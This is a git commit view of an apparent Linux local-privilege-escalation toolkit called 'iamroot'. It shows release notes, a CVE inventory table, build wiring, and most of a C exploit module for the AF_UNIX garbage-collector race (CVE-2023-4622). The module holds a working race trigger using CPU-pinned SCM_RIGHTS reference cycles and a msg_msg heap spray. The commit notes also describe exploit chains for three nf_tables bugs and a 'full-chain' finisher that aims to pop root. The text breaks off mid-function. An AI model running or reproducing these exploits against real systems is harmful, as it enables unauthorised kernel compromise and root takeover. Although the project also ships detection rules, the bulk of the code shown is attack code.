3 Commits

Author SHA1 Message Date
leviathan 1bcfdd0c9f release: v0.3.0 — 4 new CVE modules (24 total)
release / build (arm64) (push) Waiting to run
release / build (x86_64) (push) Waiting to run
release / release (push) Blocked by required conditions
iamroot.c: bump IAMROOT_VERSION 0.2.0 → 0.3.0
  CVES.md: add inventory entries for nft_set_uaf, af_unix_gc,
           nft_fwd_dup, nft_payload; extend operations table;
           bump counts (🟢 13 · 🟡 11 · 🔵 0 ·  1).
  README.md: update Status to 24 modules, list all 11 🟡 modules.

Module families now spanning:
  - copy_fail_family (page-cache write)
  - nf_tables (4 modules: nf_tables, nft_set_uaf, nft_fwd_dup, nft_payload)
  - af_packet (2 modules: af_packet, af_packet2)
  - overlayfs (2 modules: overlayfs CVE-2021-3493, overlayfs_setuid)
  - af_unix (new in v0.3.0)
  - plus 10 single-CVE families
2026-05-16 22:25:15 -04:00
leviathan 5a808e3583 modules: 4 new CVE modules — nft_set_uaf + af_unix_gc + nft_fwd_dup + nft_payload
Each module: detect with branch-backport ranges + userns reach +
hand-rolled trigger + msg_msg cross-cache groom + slabinfo witness
+ /tmp/iamroot-<name>.log breadcrumb + auditd rules + --full-chain
finisher (FALLBACK depth, sentinel-arbitrated).

  nft_set_uaf (CVE-2023-32233, +1033): anonymous-set UAF
                (Sondej+Krysiuk). 5.1 → 6.4. nfnetlink batch:
                NEWTABLE → NEWCHAIN → NEWSET(ANON|EVAL) →
                NEWRULE(lookup) → DELSET → DELRULE; cg-512 spray.

  af_unix_gc (CVE-2023-4622, +813): GC race UAF (Lin Ma). ~2.0 → 6.5
                — widest range of any module. Two-thread race driver
                (SCM_RIGHTS cycle vs unix_gc trigger) + kmalloc-512
                spray. No userns needed.

  nft_fwd_dup (CVE-2022-25636, +1024): nft_fwd_dup_netdev_offload
                heap OOB (Aaron Adams). 5.4 → 5.17. NFT_CHAIN_HW_OFFLOAD
                chain + 16 immediates + fwd to overrun action.entries[].

  nft_payload (CVE-2023-0179, +1136): set-id memory corruption
                (Davide Ornaghi). 5.4 → 6.2. NFTA_SET_DESC variable
                element + NFTA_SET_ELEM_EXPRESSIONS with payload-set
                whose verdict.code drives the regs->data[] OOB.

All 4 honor verified-vs-claimed: trigger fires, primitive grooms, no
fabricated offsets. EXPLOIT_OK only via empirical setuid-bash sentinel.

Build clean on Debian 6.12.86; all 4 refuse cleanly on both default
and --full-chain paths via the existing patched-kernel detect gate.
2026-05-16 22:24:15 -04:00
leviathan 6a0a7d8718 scaffold: 4 new module dirs + registry/Makefile wiring (stubs)
Pre-scaffolding for the next batch (CVE-2023-32233, CVE-2023-4622,
CVE-2022-25636, CVE-2023-0179). Each module ships as a 21-line
stub returning PRECOND_FAIL; parallel agents fill in the real
detect/exploit/--full-chain implementations.

This commit keeps registry.h / iamroot.c / Makefile in one place
so the 4 parallel agents don't collide on shared-file edits — they
each own a single iamroot_modules.c.

Build clean on Debian 6.12.86; --list shows all 24 modules
including the 4 new stubs.
2026-05-16 22:17:47 -04:00
13 changed files with 4202 additions and 10 deletions
+9 -1
View File
@@ -23,7 +23,7 @@ Status legend:
- 🔴 **DEPRECATED** — fully patched everywhere relevant; kept for - 🔴 **DEPRECATED** — fully patched everywhere relevant; kept for
historical reference only historical reference only
**Counts (v0.2.0):** 🟢 13 · 🟡 7 (all `--full-chain` capable) · 🔵 0 · ⚪ 1 · 🔴 0 **Counts (v0.3.0):** 🟢 13 · 🟡 11 (all `--full-chain` capable) · 🔵 0 · ⚪ 1 · 🔴 0
## Inventory ## Inventory
@@ -50,6 +50,10 @@ Status legend:
| CVE-2022-0185 | legacy_parse_param fsconfig heap OOB → container-escape | LPE (cross-cache UAF → cred overwrite from rootless container) | mainline 5.16.2 (Jan 2022) | `fuse_legacy` | 🟡 | userns+mountns reach, fsopen("cgroup2") + double fsconfig SET_STRING fires the 4k OOB, msg_msg cross-cache groom in kmalloc-4k, MSG_COPY read-back detects whether the OOB landed in an adjacent neighbour. Stops before the m_ts overflow → MSG_COPY arbitrary read chain (scaffold present, no per-kernel offsets). **Container-escape angle** — relevant to rootless docker/podman/snap. Branch backports: 5.16.2 / 5.15.14 / 5.10.91 / 5.4.171. | | CVE-2022-0185 | legacy_parse_param fsconfig heap OOB → container-escape | LPE (cross-cache UAF → cred overwrite from rootless container) | mainline 5.16.2 (Jan 2022) | `fuse_legacy` | 🟡 | userns+mountns reach, fsopen("cgroup2") + double fsconfig SET_STRING fires the 4k OOB, msg_msg cross-cache groom in kmalloc-4k, MSG_COPY read-back detects whether the OOB landed in an adjacent neighbour. Stops before the m_ts overflow → MSG_COPY arbitrary read chain (scaffold present, no per-kernel offsets). **Container-escape angle** — relevant to rootless docker/podman/snap. Branch backports: 5.16.2 / 5.15.14 / 5.10.91 / 5.4.171. |
| CVE-2023-3269 | StackRot — maple-tree VMA-split UAF | LPE (kernel R/W via maple node use-after-RCU) | mainline 6.4-rc4 (Jul 2023) | `stackrot` | 🟡 | Two-thread race driver (MAP_GROWSDOWN + mremap rotation vs fork+fault) with cpu pinning + 3 s budget; kmalloc-192 spray for anon_vma/anon_vma_chain; race-iteration + signal breadcrumb. Honest reliability note in module header: **~<1% race-win/run on a vulnerable kernel** — the public PoC averages minutes-to-hours and needs a much wider VMA staging matrix to be reliable. Useful as a "is the maple-tree path reachable here?" probe. Branch backports: 6.4.4 / 6.3.13 / 6.1.37. | | CVE-2023-3269 | StackRot — maple-tree VMA-split UAF | LPE (kernel R/W via maple node use-after-RCU) | mainline 6.4-rc4 (Jul 2023) | `stackrot` | 🟡 | Two-thread race driver (MAP_GROWSDOWN + mremap rotation vs fork+fault) with cpu pinning + 3 s budget; kmalloc-192 spray for anon_vma/anon_vma_chain; race-iteration + signal breadcrumb. Honest reliability note in module header: **~<1% race-win/run on a vulnerable kernel** — the public PoC averages minutes-to-hours and needs a much wider VMA staging matrix to be reliable. Useful as a "is the maple-tree path reachable here?" probe. Branch backports: 6.4.4 / 6.3.13 / 6.1.37. |
| CVE-2020-14386 | AF_PACKET tpacket_rcv VLAN integer underflow | LPE (heap OOB write via crafted frame) | mainline 5.9 (Sep 2020) | `af_packet2` | 🟡 | Sibling of CVE-2017-7308; tp_reserve underflow + sendmmsg skb spray + slab-delta witness. PRIMITIVE-DEMO scope (no cred overwrite). Branch backports: 5.8.7 / 5.7.16 / 5.4.62 / 4.19.143 / 4.14.197 / 4.9.235. Or Cohen's disclosure. Shares `iamroot-af-packet` audit key with CVE-2017-7308. | | CVE-2020-14386 | AF_PACKET tpacket_rcv VLAN integer underflow | LPE (heap OOB write via crafted frame) | mainline 5.9 (Sep 2020) | `af_packet2` | 🟡 | Sibling of CVE-2017-7308; tp_reserve underflow + sendmmsg skb spray + slab-delta witness. PRIMITIVE-DEMO scope (no cred overwrite). Branch backports: 5.8.7 / 5.7.16 / 5.4.62 / 4.19.143 / 4.14.197 / 4.9.235. Or Cohen's disclosure. Shares `iamroot-af-packet` audit key with CVE-2017-7308. |
| CVE-2023-32233 | nf_tables anonymous-set UAF | LPE (kernel UAF in nft_set transaction) | mainline 6.4-rc4 (May 2023) | `nft_set_uaf` | 🟡 | Sondej+Krysiuk. Hand-rolled nfnetlink batch (NEWTABLE → NEWCHAIN → NEWSET(ANON\|EVAL) → NEWRULE(lookup) → DELSET → DELRULE) drives the deactivation skip; cg-512 msg_msg cross-cache spray. Branch backports: 4.19.283 / 5.4.243 / 5.10.180 / 5.15.111 / 6.1.28 / 6.2.15 / 6.3.2. --full-chain forges freed-set with `set->data = kaddr`. |
| CVE-2023-4622 | AF_UNIX garbage-collector race UAF | LPE (slab UAF, plain unprivileged) | mainline 6.6-rc1 (Aug 2023) | `af_unix_gc` | 🟡 | Lin Ma. Two-thread race driver: SCM_RIGHTS cycle vs unix_gc trigger; kmalloc-512 (SLAB_TYPESAFE_BY_RCU) refill via msg_msg. **Widest deployment of any module — bug exists since 2.x.** No userns required. Branch backports: 4.14.326 / 4.19.295 / 5.4.257 / 5.10.197 / 5.15.130 / 6.1.51 / 6.5.0. |
| CVE-2022-25636 | nft_fwd_dup_netdev_offload heap OOB | LPE (kernel R/W via offload action[] OOB) | mainline 5.17 / 5.16.11 (Feb 2022) | `nft_fwd_dup` | 🟡 | Aaron Adams (NCC). NFT_CHAIN_HW_OFFLOAD chain + 16 immediates + fwd writes past action.entries[1]. msg_msg kmalloc-512 spray. Branch backports: 5.4.181 / 5.10.102 / 5.15.25 / 5.16.11. |
| CVE-2023-0179 | nft_payload set-id memory corruption | LPE (regs->data[] OOB R/W) | mainline 6.2-rc4 / 6.1.6 (Jan 2023) | `nft_payload` | 🟡 | Davide Ornaghi. NFTA_SET_DESC variable-length element + NFTA_SET_ELEM_EXPRESSIONS payload-set whose verdict.code drives the OOB. Dual cg-96 + 1k spray. Branch backports: 4.14.302 / 4.19.269 / 5.4.229 / 5.10.163 / 5.15.88 / 6.1.6. |
| CVE-TBD | Fragnesia (ESP shared-frag in-place encrypt) | LPE (page-cache write) | mainline TBD | `_stubs/fragnesia_TBD` | ⚪ | Stub. Per `findings/audit_leak_write_modprobe_backups_2026-05-16.md`, requires CAP_NET_ADMIN in userns netns — may or may not be in-scope depending on target environment. | | CVE-TBD | Fragnesia (ESP shared-frag in-place encrypt) | LPE (page-cache write) | mainline TBD | `_stubs/fragnesia_TBD` | ⚪ | Stub. Per `findings/audit_leak_write_modprobe_backups_2026-05-16.md`, requires CAP_NET_ADMIN in userns netns — may or may not be in-scope depending on target environment. |
## Operations supported per module ## Operations supported per module
@@ -78,6 +82,10 @@ Symbols: ✓ = supported, — = not applicable / no automated path.
| af_packet2 | ✓ | ✓ (primitive) | — (upgrade kernel) | — | ✓ (auditd, shared key) | | af_packet2 | ✓ | ✓ (primitive) | — (upgrade kernel) | — | ✓ (auditd, shared key) |
| fuse_legacy | ✓ | ✓ (primitive) | — (upgrade kernel) | ✓ (queue drain) | ✓ (auditd) | | fuse_legacy | ✓ | ✓ (primitive) | — (upgrade kernel) | ✓ (queue drain) | ✓ (auditd) |
| stackrot | ✓ | ✓ (race) | — (upgrade kernel) | ✓ (log unlink) | ✓ (auditd) | | stackrot | ✓ | ✓ (race) | — (upgrade kernel) | ✓ (log unlink) | ✓ (auditd) |
| nft_set_uaf | ✓ | ✓ (primitive) | — (upgrade kernel) | ✓ (queue drain) | ✓ (auditd + sigma) |
| af_unix_gc | ✓ | ✓ (race) | — (upgrade kernel) | ✓ (queue drain) | ✓ (auditd) |
| nft_fwd_dup | ✓ | ✓ (primitive) | — (upgrade kernel) | ✓ (queue drain) | ✓ (auditd) |
| nft_payload | ✓ | ✓ (primitive) | — (upgrade kernel) | ✓ (queue drain) | ✓ (auditd + sigma) |
## Pipeline for additions ## Pipeline for additions
+21 -1
View File
@@ -106,10 +106,30 @@ OSU_DIR := modules/overlayfs_setuid_cve_2023_0386
OSU_SRCS := $(OSU_DIR)/iamroot_modules.c OSU_SRCS := $(OSU_DIR)/iamroot_modules.c
OSU_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(OSU_SRCS)) OSU_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(OSU_SRCS))
# Family: nft_set_uaf (CVE-2023-32233)
NSU_DIR := modules/nft_set_uaf_cve_2023_32233
NSU_SRCS := $(NSU_DIR)/iamroot_modules.c
NSU_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(NSU_SRCS))
# Family: af_unix_gc (CVE-2023-4622)
AUG_DIR := modules/af_unix_gc_cve_2023_4622
AUG_SRCS := $(AUG_DIR)/iamroot_modules.c
AUG_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(AUG_SRCS))
# Family: nft_fwd_dup (CVE-2022-25636)
NFD_DIR := modules/nft_fwd_dup_cve_2022_25636
NFD_SRCS := $(NFD_DIR)/iamroot_modules.c
NFD_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(NFD_SRCS))
# Family: nft_payload (CVE-2023-0179)
NPL_DIR := modules/nft_payload_cve_2023_0179
NPL_SRCS := $(NPL_DIR)/iamroot_modules.c
NPL_OBJS := $(patsubst %.c,$(BUILD)/%.o,$(NPL_SRCS))
# Top-level dispatcher # Top-level dispatcher
TOP_OBJ := $(BUILD)/iamroot.o TOP_OBJ := $(BUILD)/iamroot.o
ALL_OBJS := $(TOP_OBJ) $(CORE_OBJS) $(CFF_OBJS) $(DP_OBJS) $(EB_OBJS) $(PK_OBJS) $(NFT_OBJS) $(OVL_OBJS) $(CR4_OBJS) $(DCOW_OBJS) $(PTM_OBJS) $(NXC_OBJS) $(AFP_OBJS) $(FUL_OBJS) $(STR_OBJS) $(AFP2_OBJS) $(CRA_OBJS) $(OSU_OBJS) ALL_OBJS := $(TOP_OBJ) $(CORE_OBJS) $(CFF_OBJS) $(DP_OBJS) $(EB_OBJS) $(PK_OBJS) $(NFT_OBJS) $(OVL_OBJS) $(CR4_OBJS) $(DCOW_OBJS) $(PTM_OBJS) $(NXC_OBJS) $(AFP_OBJS) $(FUL_OBJS) $(STR_OBJS) $(AFP2_OBJS) $(CRA_OBJS) $(OSU_OBJS) $(NSU_OBJS) $(AUG_OBJS) $(NFD_OBJS) $(NPL_OBJS)
.PHONY: all clean debug static help .PHONY: all clean debug static help
+8 -7
View File
@@ -94,20 +94,21 @@ The same binary covers offense and defense:
## Status ## Status
**Active — v0.2.0 cut 2026-05-16.** Corpus covers **20 modules** **Active — v0.3.0 cut 2026-05-16.** Corpus covers **24 modules**
across the 2016 → 2026 LPE timeline: across the 2016 → 2026 LPE timeline:
- 🟢 **13 modules land root** end-to-end on a vulnerable host - 🟢 **13 modules land root** end-to-end on a vulnerable host
(copy_fail family ×5, dirty_pipe, entrybleed leak, pwnkit, (copy_fail family ×5, dirty_pipe, entrybleed leak, pwnkit,
overlayfs CVE-2021-3493, dirty_cow, ptrace_traceme, overlayfs CVE-2021-3493, dirty_cow, ptrace_traceme,
cgroup_release_agent, overlayfs_setuid CVE-2023-0386). cgroup_release_agent, overlayfs_setuid CVE-2023-0386).
- 🟡 **7 modules fire the kernel primitive** by default and refuse to - 🟡 **11 modules fire the kernel primitive** by default and refuse
claim root without empirical confirmation. Pass `--full-chain` to to claim root without empirical confirmation. Pass `--full-chain`
engage the shared `modprobe_path` finisher and attempt root pop — to engage the shared `modprobe_path` finisher and attempt root
requires kernel offsets via env vars / `/proc/kallsyms` / pop — requires kernel offsets via env vars / `/proc/kallsyms` /
`/boot/System.map`; see [`docs/OFFSETS.md`](docs/OFFSETS.md). `/boot/System.map`; see [`docs/OFFSETS.md`](docs/OFFSETS.md).
Modules: af_packet, af_packet2, cls_route4, fuse_legacy, nf_tables, Modules: af_packet, af_packet2, af_unix_gc, cls_route4,
netfilter_xtcompat, stackrot. fuse_legacy, nf_tables, netfilter_xtcompat, nft_fwd_dup,
nft_payload, nft_set_uaf, stackrot.
- Detection rules ship inline (auditd / sigma / yara / falco) and - Detection rules ship inline (auditd / sigma / yara / falco) and
are exported via `iamroot --detect-rules --format=…`. are exported via `iamroot --detect-rules --format=…`.
+4
View File
@@ -36,5 +36,9 @@ void iamroot_register_stackrot(void);
void iamroot_register_af_packet2(void); void iamroot_register_af_packet2(void);
void iamroot_register_cgroup_release_agent(void); void iamroot_register_cgroup_release_agent(void);
void iamroot_register_overlayfs_setuid(void); void iamroot_register_overlayfs_setuid(void);
void iamroot_register_nft_set_uaf(void);
void iamroot_register_af_unix_gc(void);
void iamroot_register_nft_fwd_dup(void);
void iamroot_register_nft_payload(void);
#endif /* IAMROOT_REGISTRY_H */ #endif /* IAMROOT_REGISTRY_H */
+5 -1
View File
@@ -25,7 +25,7 @@
#include <string.h> #include <string.h>
#include <unistd.h> #include <unistd.h>
#define IAMROOT_VERSION "0.2.0" #define IAMROOT_VERSION "0.3.0"
static const char BANNER[] = static const char BANNER[] =
"\n" "\n"
@@ -590,6 +590,10 @@ int main(int argc, char **argv)
iamroot_register_af_packet2(); iamroot_register_af_packet2();
iamroot_register_cgroup_release_agent(); iamroot_register_cgroup_release_agent();
iamroot_register_overlayfs_setuid(); iamroot_register_overlayfs_setuid();
iamroot_register_nft_set_uaf();
iamroot_register_af_unix_gc();
iamroot_register_nft_fwd_dup();
iamroot_register_nft_payload();
enum mode mode = MODE_SCAN; enum mode mode = MODE_SCAN;
struct iamroot_ctx ctx = {0}; struct iamroot_ctx ctx = {0};
@@ -0,0 +1,847 @@
/*
* af_unix_gc_cve_2023_4622 — IAMROOT module
*
* AF_UNIX garbage collector race UAF. The unix_gc() collector walks
* the list of GC-candidate sockets while SCM_RIGHTS sendmsg/close can
* concurrently mutate the inflight refcount on the same sockets. The
* narrow window between a socket being marked GC-eligible and the
* collector actually freeing it can be widened by tightly cycling
* SCM_RIGHTS messages — when the race wins, a `struct unix_sock` is
* freed while still reachable from another thread's skb queue, giving
* slab UAF in the SLAB_TYPESAFE_BY_RCU kmalloc-512 bucket.
*
* Discovered by Lin Ma (ZJU) in Aug 2023. Public exploit chain uses
* the UAF + msg_msg cross-cache spray to refill the freed slot, then
* pivots through the now-controlled `unix_sock->peer` field.
*
* STATUS: 🟡 PRIMITIVE — race-driver + msg_msg groom + empirical
* witness. We carry the trigger (SCM_RIGHTS cycle + GC), the
* kmalloc-512 spray, CPU pinning for race-win improvement, and the
* slab-delta + signal-disposition witness. We do NOT carry the
* leak (no read primitive in-module) nor a kernel-build-specific
* fake unix_sock layout. Per verified-vs-claimed: a SIGSEGV/SIGKILL
* in the race child IS recorded but does NOT upgrade to EXPLOIT_OK
* — only an actual cred swap (euid==0) does, and we do not
* demonstrate that without --full-chain.
*
* --full-chain (HONEST RELIABILITY): extends the race budget from
* 5 s to 30 s and re-sprays kmalloc-512 with payloads carrying the
* target kaddr at strided offsets. Race-win rate on a real
* vulnerable kernel is iteration-dependent — Lin Ma's PoC reports
* thousands of iterations to first reclaim. The shared
* modprobe_path finisher's 3 s sentinel timeout catches the
* overwhelmingly common no-land outcome gracefully.
*
* Affected: ALL Linux kernels with AF_UNIX below the fix. The bug
* has been in the GC path since the 2.x era. Stable backports:
* 4.14.x : K >= 4.14.326
* 4.19.x : K >= 4.19.295
* 5.4.x : K >= 5.4.257
* 5.10.x : K >= 5.10.197
* 5.15.x : K >= 5.15.130
* 6.1.x : K >= 6.1.51 (LTS)
* 6.5.x : K >= 6.5.0 (mainline fix)
* 6.6+ : patched
*
* Preconditions:
* - AF_UNIX socket creation works (always — no module gate)
* - msgsnd / sysv IPC available for spray
* - SCM_RIGHTS via sendmsg available (universal)
* - userns NOT required — works as a plain unprivileged user
*
* Coverage rationale: the AF_UNIX GC has been touched extensively
* for the 2023-2024 series of races (Lin Ma + Pwn2Own follow-ups);
* this CVE is the first publicly-disclosed entry in that series and
* carries the widest version range of any module we ship.
*/
#include "iamroot_modules.h"
#include "../../core/registry.h"
#include "../../core/kernel_range.h"
#include "../../core/offsets.h"
#include "../../core/finisher.h"
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <stdbool.h>
#include <stdatomic.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <signal.h>
#include <pthread.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/socket.h>
#ifdef __linux__
# include <sched.h>
# include <sys/ipc.h>
# include <sys/msg.h>
# include <sys/un.h>
#endif
/* macOS clangd lacks Linux SCM_* / CMSG_* fully — guard fallbacks. */
#ifndef SCM_RIGHTS
# define SCM_RIGHTS 0x01
#endif
#ifndef SOL_SOCKET
# define SOL_SOCKET 1
#endif
#ifndef MSG_DONTWAIT
# define MSG_DONTWAIT 0x40
#endif
/* ---- Kernel-range table ------------------------------------------ */
static const struct kernel_patched_from af_unix_gc_patched_branches[] = {
{4, 14, 326},
{4, 19, 295},
{5, 4, 257},
{5, 10, 197},
{5, 15, 130},
{6, 1, 51}, /* 6.1 LTS */
{6, 5, 0}, /* mainline fix landed in 6.5 (technically 6.6-rc1
but stable 6.5.x carries the patch) */
};
static const struct kernel_range af_unix_gc_range = {
.patched_from = af_unix_gc_patched_branches,
.n_patched_from = sizeof(af_unix_gc_patched_branches) /
sizeof(af_unix_gc_patched_branches[0]),
};
/* ---- Detect ------------------------------------------------------- */
/* Sanity: can we actually create an AF_UNIX socket on this host?
* In some seccomp/ns-restricted sandboxes socket(AF_UNIX, ...) fails;
* in that case the exploit cannot even reach the GC path. */
static bool can_create_af_unix(void)
{
int s = socket(AF_UNIX, SOCK_DGRAM, 0);
if (s < 0) return false;
close(s);
return true;
}
static iamroot_result_t af_unix_gc_detect(const struct iamroot_ctx *ctx)
{
struct kernel_version v;
if (!kernel_version_current(&v)) {
fprintf(stderr, "[!] af_unix_gc: could not parse kernel version\n");
return IAMROOT_TEST_ERROR;
}
/* No lower bound: this bug has been in the AF_UNIX GC path since
* the dawn of time. ANY kernel below the fix is vulnerable. The
* kernel_range walker handles "older than every entry" correctly
* (returns false → not patched → vulnerable). */
bool patched = kernel_range_is_patched(&af_unix_gc_range, &v);
if (patched) {
if (!ctx->json) {
fprintf(stderr, "[+] af_unix_gc: kernel %s is patched\n", v.release);
}
return IAMROOT_OK;
}
/* Reachability probe — socket(AF_UNIX, ...) must succeed. */
if (!can_create_af_unix()) {
if (!ctx->json) {
fprintf(stderr, "[-] af_unix_gc: AF_UNIX socket() failed — "
"exotic seccomp/sandbox, bug unreachable here\n");
}
return IAMROOT_PRECOND_FAIL;
}
if (!ctx->json) {
fprintf(stderr, "[!] af_unix_gc: kernel %s in vulnerable range\n", v.release);
fprintf(stderr, "[i] af_unix_gc: bug is reachable as PLAIN UNPRIVILEGED USER\n"
" (no userns / no CAP_* required — AF_UNIX is universally\n"
" creatable). The race window is microseconds wide and\n"
" needs thousands of iterations to win on average.\n");
}
return IAMROOT_VULNERABLE;
}
/* ---- Race-driver state ------------------------------------------- */
#ifdef __linux__
#define AFUG_RACE_TIME_BUDGET 5 /* seconds — primitive-only mode */
#define AFUG_RACE_FULLCHAIN_BUDGET 30 /* seconds — --full-chain */
/* kmalloc-512 spray width — `struct unix_sock` is in the kmalloc-512
* bucket on 64-bit x86 with SLAB_TYPESAFE_BY_RCU. We need enough
* msg_msg slots to make refill probable within the RCU grace period. */
#define AFUG_SPRAY_QUEUES 24
#define AFUG_SPRAY_PER_QUEUE 48
#define AFUG_SPRAY_PAYLOAD 496 /* 512 - 16 (msg_msg hdr) */
/* SCM_RIGHTS race width: how many inflight fds per cycle. The bug
* is driven by inflight count crossing the GC threshold; a handful
* per cycle keeps the GC heuristic primed without OOM. */
#define AFUG_SCM_FDS_PER_MSG 3
struct ipc_payload {
long mtype;
unsigned char buf[AFUG_SPRAY_PAYLOAD];
};
static _Atomic int g_race_running;
static _Atomic uint64_t g_thread_a_iters;
static _Atomic uint64_t g_thread_b_iters;
static _Atomic uint64_t g_thread_a_errs;
/* Pin to a CPU to make Thread A and Thread B land on different cores.
* Best-effort: failure is non-fatal (e.g., affinity disallowed under
* some seccomp configs). */
static void pin_to_cpu(int cpu)
{
cpu_set_t set;
CPU_ZERO(&set);
CPU_SET(cpu, &set);
sched_setaffinity(0, sizeof set, &set);
}
/* The race victim region: a pair of socketpair(AF_UNIX) endpoints
* forming a reference cycle. Closing one end while the other has
* inflight fds queued is what naturally triggers unix_gc().
*
* Layout we drive (Lin Ma style):
*
* pair_a = socketpair(); pair_b = socketpair();
* send pair_b[0] via SCM_RIGHTS over pair_a[0] → pair_a[1]
* send pair_a[0] via SCM_RIGHTS over pair_b[0] → pair_b[1]
* close all 4 endpoints — now we have a cycle the GC will collect
*
* Thread A loops the build-cycle-and-close.
* Thread B loops sending its own SCM_RIGHTS messages on independent
* pairs to perturb the inflight count + race the collector. */
/* Send an SCM_RIGHTS message with `nfds` fds over `sock`. Returns 0
* on success, -1 on error. */
static int send_scm_rights(int sock, const int *fds, int nfds)
{
char ctrl[CMSG_SPACE(sizeof(int) * AFUG_SCM_FDS_PER_MSG)];
memset(ctrl, 0, sizeof ctrl);
char payload = 0;
struct iovec iov = { .iov_base = &payload, .iov_len = 1 };
struct msghdr msg = {0};
msg.msg_iov = &iov;
msg.msg_iovlen = 1;
msg.msg_control = ctrl;
msg.msg_controllen = CMSG_SPACE(sizeof(int) * nfds);
struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
if (!cmsg) return -1;
cmsg->cmsg_level = SOL_SOCKET;
cmsg->cmsg_type = SCM_RIGHTS;
cmsg->cmsg_len = CMSG_LEN(sizeof(int) * nfds);
memcpy(CMSG_DATA(cmsg), fds, sizeof(int) * nfds);
if (sendmsg(sock, &msg, MSG_DONTWAIT) < 0) return -1;
return 0;
}
/* Thread A: tight-loop SCM_RIGHTS-cycle + close to drive GC.
*
* Each iteration:
* 1. Build two socketpairs (A=[a0,a1], B=[b0,b1]).
* 2. Send b0 via SCM_RIGHTS over a0 → a1 receives nothing yet (we
* don't recvmsg — that's the point: the fd stays inflight).
* 3. Send a0 via SCM_RIGHTS over b0 → b1 receives nothing yet.
* 4. close() all 4 user-side fds. Now both endpoints are unreachable
* from userspace BUT each is referenced from the other's skb
* queue → reference cycle → next unix_gc() pass collects them.
*
* The kernel's GC heuristic kicks when the inflight count exceeds
* the count of file refs in the system; closing the user-side fds in
* a tight loop reliably triggers it. */
static void *race_thread_a(void *arg)
{
(void)arg;
pin_to_cpu(0);
while (atomic_load_explicit(&g_race_running, memory_order_acquire)) {
int pa[2], pb[2];
if (socketpair(AF_UNIX, SOCK_DGRAM, 0, pa) < 0) {
atomic_fetch_add_explicit(&g_thread_a_errs, 1, memory_order_relaxed);
sched_yield();
continue;
}
if (socketpair(AF_UNIX, SOCK_DGRAM, 0, pb) < 0) {
close(pa[0]); close(pa[1]);
atomic_fetch_add_explicit(&g_thread_a_errs, 1, memory_order_relaxed);
sched_yield();
continue;
}
/* Cycle: send pb[0] over pa, send pa[0] over pb. We also send
* pb[1]/pa[1] alongside to widen the inflight count per cycle
* (the GC trigger heuristic compares inflight vs total file
* refs — more inflight per cycle == earlier GC). */
int fds_a[AFUG_SCM_FDS_PER_MSG] = { pb[0], pb[1], pb[0] };
int fds_b[AFUG_SCM_FDS_PER_MSG] = { pa[0], pa[1], pa[0] };
(void)send_scm_rights(pa[0], fds_a, AFUG_SCM_FDS_PER_MSG);
(void)send_scm_rights(pb[0], fds_b, AFUG_SCM_FDS_PER_MSG);
/* Close the user-side fds. The kernel-side refs are now only
* held via the inflight skbs — perfect reference cycle for
* the GC to find. */
close(pa[0]); close(pa[1]);
close(pb[0]); close(pb[1]);
atomic_fetch_add_explicit(&g_thread_a_iters, 1, memory_order_relaxed);
}
return NULL;
}
/* Thread B: independent SCM_RIGHTS traffic on a held pair to keep
* the GC scan list churning while Thread A creates new candidates.
*
* Holds a long-lived socketpair and repeatedly sends + recvs SCM_RIGHTS
* with random fds (dup'd from /dev/null). This drives the GC's "scan
* list" rebuild path concurrently with Thread A's frees — the race
* window that fires the UAF is exactly here.
*
* We don't directly call unix_gc() — there's no userspace knob — but
* the GC heuristic is inflight-count driven, and Thread A's cycle
* loop pushes that count past the threshold within a few thousand
* iterations. */
static void *race_thread_b(void *arg)
{
(void)arg;
pin_to_cpu(1);
/* Long-lived pair for the perturbation loop. */
int held[2];
if (socketpair(AF_UNIX, SOCK_DGRAM, 0, held) < 0) {
return NULL;
}
/* Spare fd source — /dev/null dups are harmless to pass. */
int devnull = open("/dev/null", O_RDWR);
if (devnull < 0) {
close(held[0]); close(held[1]);
return NULL;
}
while (atomic_load_explicit(&g_race_running, memory_order_acquire)) {
int fds[AFUG_SCM_FDS_PER_MSG];
for (int i = 0; i < AFUG_SCM_FDS_PER_MSG; i++) {
fds[i] = dup(devnull);
}
(void)send_scm_rights(held[0], fds, AFUG_SCM_FDS_PER_MSG);
for (int i = 0; i < AFUG_SCM_FDS_PER_MSG; i++) {
if (fds[i] >= 0) close(fds[i]);
}
/* Drain the recv side so the held pair doesn't backpressure. */
char drain[16];
char ctrl[CMSG_SPACE(sizeof(int) * AFUG_SCM_FDS_PER_MSG)];
struct iovec iov = { .iov_base = drain, .iov_len = sizeof drain };
struct msghdr msg = {0};
msg.msg_iov = &iov; msg.msg_iovlen = 1;
msg.msg_control = ctrl; msg.msg_controllen = sizeof ctrl;
if (recvmsg(held[1], &msg, MSG_DONTWAIT) > 0) {
/* Close any fds we received so we don't leak. */
for (struct cmsghdr *c = CMSG_FIRSTHDR(&msg); c;
c = CMSG_NXTHDR(&msg, c)) {
if (c->cmsg_level == SOL_SOCKET && c->cmsg_type == SCM_RIGHTS) {
int nfd = (c->cmsg_len - CMSG_LEN(0)) / sizeof(int);
int *rfds = (int *)CMSG_DATA(c);
for (int j = 0; j < nfd; j++)
if (rfds[j] >= 0) close(rfds[j]);
}
}
}
atomic_fetch_add_explicit(&g_thread_b_iters, 1, memory_order_relaxed);
}
close(devnull);
close(held[0]); close(held[1]);
return NULL;
}
/* ---- msg_msg cross-cache spray for kmalloc-512 ------------------- */
static int spray_kmalloc_512(int queues[AFUG_SPRAY_QUEUES])
{
struct ipc_payload p;
memset(&p, 0, sizeof p);
p.mtype = 0x55; /* 'U' — unix */
memset(p.buf, 0x55, sizeof p.buf);
memcpy(p.buf, "IAMROOTU", 8);
int created = 0;
for (int i = 0; i < AFUG_SPRAY_QUEUES; i++) {
int q = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
if (q < 0) { queues[i] = -1; continue; }
queues[i] = q;
created++;
for (int j = 0; j < AFUG_SPRAY_PER_QUEUE; j++) {
if (msgsnd(q, &p, sizeof p.buf, IPC_NOWAIT) < 0) break;
}
}
return created;
}
static void drain_kmalloc_512(int queues[AFUG_SPRAY_QUEUES])
{
for (int i = 0; i < AFUG_SPRAY_QUEUES; i++) {
